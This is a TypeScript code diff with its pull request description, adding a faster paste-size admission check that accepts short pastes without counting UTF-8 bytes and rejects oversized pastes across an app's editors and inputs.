+      reason: 'pasted-bytes',
+      actual: pastedBytes,
+      limit: input.maxPastedBytes,
+    }
+  }
+
+  if (input.maxResultBytes === undefined && input.maxResultCharacters === undefined) {
+    return { accepted: true, pastedBytes }
+  }
+
+  const { currentText, start, end } = normalizedSelection(input)
+  const resultCharacters = currentText.length - (end - start) + pastedText.length
+  if (input.maxResultCharacters !== undefined && resultCharacters > input.maxResultCharacters) {
+    return {
+      accepted: false,
+      reason: 'result-characters',
+      actual: resultCharacters,
+      limit: input.maxResultCharacters,
+    }
+  }
+
+  if (input.maxResultBytes === undefined) {
+    return { accepted: true, pastedBytes, resultCharacters }
+  }
+
+  const prefixBytes = utf8ByteLengthRange(currentText, 0, start, input.maxResultBytes)
+  if (prefixBytes > input.maxResultBytes) {
+    return {
+      accepted: false,
+      reason: 'result-bytes',
+      actual: prefixBytes,
+      limit: input.maxResultBytes,
+    }
+  }
+  const suffixBudget = input.maxResultBytes - prefixBytes
+  const suffixBytes = utf8ByteLengthRange(currentText, end, currentText.length, suffixBudget)
+  const resultBytes = prefixBytes + suffixBytes + (pastedBytes ?? utf8ByteLength(pastedText))
+  if (resultBytes > input.maxResultBytes) {
+    return {
+      accepted: false,
+      reason: 'result-bytes',
+      actual: resultBytes,
+      limit: input.maxResultBytes,
+    }
+  }
+
+  return { accepted: true, pastedBytes, resultBytes, resultCharacters }
+}
+
+/** Counts logical rows without allocating the array produced by `split()`. */
+export function countPasteRows(text: string, stopAfter = Number.POSITIVE_INFINITY): number {
+  if (!text) return 0
+  let rows = 1
+  for (let index = 0; index < text.length; index++) {
+    const code = text.charCodeAt(index)
+    if (code === 10) {
+      rows += 1
+    } else if (code === 13) {
+      rows += 1
+      if (text.charCodeAt(index + 1) === 10) index += 1
+    }
+    if (rows > stopAfter) return rows
+  }
+  return rows
+}
+
+export function formatPasteLimit(bytes: number): string {
+  if (bytes >= 1_000_000 && bytes % 1_000_000 === 0) return `${bytes / 1_000_000} MB`
+  if (bytes >= 1024 * 1024) {
+    const mebibytes = bytes / (1024 * 1024)
+    return `${Number.isInteger(mebibytes) ? mebibytes : mebibytes.toFixed(1)} MiB`
+  }
+  return `${Math.round(bytes / 1024)} KiB`
+}

--- a/packages/utils/src/paste.ts
+++ b/packages/utils/src/paste.ts
@@ -100,6 +100,10 @@ export function utf8ByteLength(value: string, stopAfter = Number.POSITIVE_INFINI
   return utf8ByteLengthRange(value, 0, value.length, stopAfter)
 }
 
+function isGuaranteedWithinUtf8Limit(characters: number, limit: number): boolean {
+  return characters <= Math.floor(limit / 3)
+}
+
 function normalizedSelection(input: TextPasteAdmissionInput): {
   currentText: string
   start: number
@@ -139,6 +143,40 @@ export function assessTextPaste(input: TextPasteAdmissionInput): TextPasteAdmiss
     }
   }
 
+  const projectsResult =
+    input.maxResultBytes !== undefined || input.maxResultCharacters !== undefined
+  if (
+    !projectsResult &&
+    input.maxPastedBytes !== undefined &&
+    isGuaranteedWithinUtf8Limit(pastedText.length, input.maxPastedBytes)
+  ) {
+    return { accepted: true }
+  }
+
+  const selection = projectsResult ? normalizedSelection(input) : null
+  const resultCharacters = selection
+    ? selection.currentText.length - (selection.end - selection.start) + pastedText.length
+    : undefined
+  if (
+    input.maxResultCharacters !== undefined &&
+    resultCharacters !== undefined &&
+    resultCharacters > input.maxResultCharacters
+  ) {
+    return {
+      accepted: false,
+      reason: 'result-characters',
+      actual: resultCharacters,
+      limit: input.maxResultCharacters,
+    }
+  }
+  if (
+    input.maxResultBytes !== undefined &&
+    resultCharacters !== undefined &&
+    isGuaranteedWithinUtf8Limit(resultCharacters, input.maxResultBytes)
+  ) {
+    return { accepted: true, resultCharacters }
+  }
+
   const pastedByteLimit = Math.max(input.maxPastedBytes ?? 0, input.maxResultBytes ?? 0)
   const pastedBytes = pastedByteLimit > 0 ? utf8ByteLength(pastedText, pastedByteLimit) : undefined
 
@@ -155,20 +193,11 @@ export function assessTextPaste(input: TextPasteAdmissionInput): TextPasteAdmiss
     }
   }
 
-  if (input.maxResultBytes === undefined && input.maxResultCharacters === undefined) {
+  if (!projectsResult) {
     return { accepted: true, pastedBytes }
   }
 
-  const { currentText, start, end } = normalizedSelection(input)
-  const resultCharacters = currentText.length - (end - start) + pastedText.length
-  if (input.maxResultCharacters !== undefined && resultCharacters > input.maxResultCharacters) {
-    return {
-      accepted: false,
-      reason: 'result-characters',
-      actual: resultCharacters,
-      limit: input.maxResultCharacters,
-    }
-  }
+  const { currentText, start, end } = selection as ReturnType<typeof normalizedSelection>
 
   if (input.maxResultBytes === undefined) {
     return { accepted: true, pastedBytes, resultCharacters }


### PR DESCRIPTION
## Summary
- add one fast paste-admission layer across native inputs, rich text, Monaco, tables, terminals, tags, emails, and secret imports
- reject oversized payloads before expensive parsing while preserving higher limits where downstream systems support them
- batch structured pastes and degrade very large prompt/editor content to cheaper rendering paths

## Type of Change
- [x] Bug fix

## Testing
- Full Sim, desktop, EMCN, and utils test suites
- Focused paste regression suites (107 tests)
- All-workspace typecheck, lint, block-registry check, and all 36 repository audits

## Checklist
- [x] Code follows project style guidelines
- [x] Self-reviewed my changes
- [x] Tests added/updated and passing
- [x] No new warnings introduced
- [x] I confirm that I have read and agree to the terms outlined in the [Contributor License Agreement (CLA)](./CONTRIBUTING.md#contributor-license-agreement-cla)